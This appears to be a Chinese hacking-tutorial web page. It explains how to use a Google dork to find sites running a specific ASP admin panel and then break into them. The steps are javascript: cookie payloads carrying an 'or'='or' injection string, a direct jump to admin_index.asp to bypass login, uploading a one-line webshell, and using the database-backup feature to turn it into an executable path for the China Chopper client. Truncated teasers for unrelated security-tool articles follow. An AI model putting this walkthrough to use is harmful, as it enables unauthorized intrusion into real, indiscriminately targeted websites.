google:关键字:inurl:szwyadmin/login.asp
打开任意一个搜索结果,打开后台登录界面后,在地址栏中全部替换成下面代码:
javascript:alert(document.cookie=”adminuser=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’='or’”));javascript:alert(document.cookie=”admindj=”+escape(“1″));
如果以上的代码不能使用请下载:http://pan.baidu.com/s/11PuhB
然后关闭此页面
再次打开后台登录界面
在地址栏中把login.asp改为admin_index.asp
就直接进入后台了。
进入后台后在添加新闻的地方上传一句话后,复制链接地址:
然后点击备份如下图:
然后点击备份数据,备份成功后得到地址:
拿起菜刀链接:
Sqlmap是一个技术专业的SQL引入专用工具,使用方法也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法: 一、Sql...
什么叫NoScript? NoScript或有时候称之为NoScript Security Suite是为Mozilla Firefox,SeaMonkey和别的根据Mozilla的Web电脑浏览器...
Ubertooth One是一款开源系统手机蓝牙扫描仪嗅探器,当然,还可以扫描仪网络嗅探低能耗手机蓝牙,Ubertooth One是适用手机蓝牙试验的开源系统2.4 GHz无线网络软件开发平台。 手...
Slowloris DOS进攻也可称之为:Slowloris拒绝服务攻击进攻; 普遍的DDOS进攻有SYN flood、UDP flood、ICMP flood等。在其中SYN flo...
什么叫Firebug? Firebug是一款完全免费的开源系统Web浏览器扩展程序流程,现阶段在Firefox和Chrome上工作中。Firebug尽管不是说“黑客工具”,但协助网站渗透测试员掌握一...
什么叫Honeyd? Honeyd由Niels Provos建立,是一个开源代码,使客户可以在各种各样计算机网上建立和运作云虚拟主机。客户能够 配备这种云虚拟主机来仿真模拟不一样种类的网络服务器,使...